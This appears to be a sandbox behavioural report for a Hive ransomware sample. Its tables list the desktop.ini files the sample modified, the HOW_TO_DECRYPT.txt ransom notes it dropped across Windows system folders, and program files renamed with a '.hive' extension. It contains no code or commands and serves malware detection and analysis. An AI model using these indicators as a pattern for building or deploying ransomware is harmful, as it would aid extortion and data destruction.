| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E9P9LRO9\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OJBRRE9R\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FGBCC7A8\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JVMDVGRW\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G4UA8T7D\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FH198YO1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XLI5Q0EH\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\DriverStore\FileRepository\prnin003.inf_amd64_neutral_3a3c6293d0cda862\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\GroupPolicy\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnca00y.inf_amd64_neutral_64560c72e81f6ad7\Amd64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\_Default\StarterN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\es-ES\Licenses\eval\HomeBasic\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wpdfs.inf_amd64_neutral_fc4ebadff3a40ae4\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\eaphost.inf_amd64_neutral_4506dea11740c089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\fr\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\OEM\Enterprise\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ja-JP\Licenses\eval\EnterpriseE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ja-JP\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migration\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\spp\tokens\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\LogFiles\SQM\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\WPD\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnky305.inf_amd64_ja-jp_4d77cc4802b17ec3\Amd64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\XPSViewer\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\sysprep\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\XPSViewer\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\smartcrd.inf_amd64_neutral_6fb75ea318f84fe5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Setup\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8TXB0XXK\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\dlmanifests\Networking-MPSSVC-Svc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\com\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migration\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\_Default\HomeBasic\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\en-US\Licenses\_Default\UltimateN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WCN\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmolic.inf_amd64_neutral_a53ac1a125d227fc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\IME\imekr8\applets\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Msdtc\Trace\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\fr-FR\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\PostMigRes\Web\base_images\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnky302.inf_amd64_ja-jp_dd74fe49601b74f6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AW10BNB7\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\OEM\HomeBasicN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\en-US\Licenses\_Default\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\SMI\Manifests\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnkm004.inf_amd64_neutral_d2aee42dc9c393ea\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-IasServer-MigPlugin\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmrock4.inf_amd64_neutral_e45293c539584293\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\SMI\Store\Machine\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\wbem\xml\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnlx00y.inf_amd64_neutral_977318f2317f5ddd\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\TxR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.-uYcD1toMB6z-bE3g_VWOSQIsO8IMhgF7aX1QOzV71k.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.-uYcD1toMB6z-bE3g_VWOXYURyTcJN8z4dP3lvbZulE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
